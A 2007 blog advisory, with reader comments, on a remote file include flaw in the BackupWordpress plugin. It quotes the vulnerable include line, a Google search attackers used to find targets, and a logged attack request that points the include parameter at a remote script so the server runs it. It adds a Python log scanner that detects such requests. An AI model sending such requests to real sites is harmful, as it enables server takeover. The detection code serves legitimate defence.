A remote file include vulnerability has been found in BackupWordpress < 0.4.3.

This means an attacker can execute code on your web server if they can access the following script directly:

http://[target]/[path]/plugins/BackUp/Archive.php

A proof of concept exploit has already been released into the wild. We suggest you upgrade as soon as possible.

Affected code:

require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";

A new version is available here.

It looks like attackers are already starting to query Google for affected web sites:

http://www.google.com.br/search?hl=pt-BR&client=firefox-a&q="plugins/BackUp/Archive/"&btnG=Pesquisar&meta=

AND

209.190.23.66 - - [02/Nov/2007:11:51:14 +0000] "GET /category/wordpress/articles//BackUp/Archive/Reader.php?bkpwp_plugin_path=http://www.freewebtown.com/komandan/tool/q3.txt?? HTTP/1.1" 404 13951 "-" "libwww-perl/5.808"
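The log line above is the signature to watch for: a request that passes the include path as a query parameter pointing at a remote URL. The following is an added example, not code from the post or the plugin: a small Python scanner for Apache combined-format access logs that flags such attempts, run over the log line from the post plus two constructed lines (the 198.51.100.7 hit, its path and its example.invalid URL are made up for the test).

```python
import re
from urllib.parse import urlparse, parse_qsl

# Apache combined log format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The parameter the vulnerable require_once reads (reachable through
# register_globals) and the URL schemes PHP's include wrappers can fetch.
SUSPECT_PARAMS = {"bkpwp_plugin_path"}
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

def find_rfi_attempts(lines):
    """Return one finding per query parameter that names the include path or
    carries a remote URL. A 404 means the script was not present on this
    host; a 200 means the include was reachable and needs investigation."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line, skip it
        query = urlparse(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            remote = value.lower().startswith(REMOTE_SCHEMES)
            if name in SUSPECT_PARAMS or remote:
                findings.append({
                    "host": m.group("host"),
                    "param": name,
                    "value": value,
                    "status": int(m.group("status")),
                    "reachable": m.group("status") == "200",
                    "agent": m.group("agent"),
                })
    return findings

# Constructed sample: the line from the post, a benign search, and a made-up hit.
SAMPLE_LOG = [
    '209.190.23.66 - - [02/Nov/2007:11:51:14 +0000] "GET /category/wordpress/articles//BackUp/Archive/Reader.php?bkpwp_plugin_path=http://www.freewebtown.com/komandan/tool/q3.txt?? HTTP/1.1" 404 13951 "-" "libwww-perl/5.808"',
    '192.0.2.10 - - [02/Nov/2007:12:00:00 +0000] "GET /?s=backup+plugin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Nov/2007:12:05:31 +0000] "GET /wp-content/plugins/BackUp/Archive.php?bkpwp_plugin_path=http://example.invalid/ HTTP/1.1" 200 320 "-" "libwww-perl/5.808"',
]

if __name__ == "__main__":
    for f in find_rfi_attempts(SAMPLE_LOG):
        print(f"{f['host']} {f['param']}={f['value']} status={f['status']} reachable={f['reachable']}")
```

Any finding with reachable=True is a host where the script answered the request and the plugin version should be checked immediately.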


Comments

[…] there is a security hole in BackUpWordPress and, to go with it, an exploit (use for testing only). A fixed version […]


BlogSecurity » Blog Archive » WordPress BlogWatch on 2 November, 2007 at 1:30 pm #

[…] Remote File Inclusion (more) […]


Philipp on 2 November, 2007 at 1:33 pm #

That’s awesome to see how fast attackers apply these new holes to their software… Not even as a security-aware guy are you really safe from getting hit, as you can’t react/check your plugins so often and fast…


DK on 2 November, 2007 at 3:08 pm #

Phil, indeed, although our htaccess guide would have prevented this attack.


Donncha O Caoimh on 2 November, 2007 at 3:52 pm #

Saw a few of those queries on my blog this morning. Luckily I don’t run that script!


alex on 2 November, 2007 at 3:54 pm #

I don’t like backup plugins because they often contain many security issues.

After a quick look, I found another security issue that allows the execution of SQL queries.


DK on 2 November, 2007 at 4:03 pm #

Donncha, check out http://blogsecurity.net/wordpress/article-210607/

These steps would have mitigated the risk of this attack :)

Alex, it’s a great plugin, but it’s new… perhaps we should get involved and sponsor it.


Truden on 3 November, 2007 at 7:31 am #

First time to see someone saying “Nice plugin, let’s sponsor it.”
Made my day :)


[…] Blog Security. Liked this post? Then subscribe to the RSS feed! In my feeds you don’t read only the introduction, […]


[…] namely the BackupWordPress plugin, since I had installed it to test it, and according to this post from BlogSecurity it was vulnerable this […]

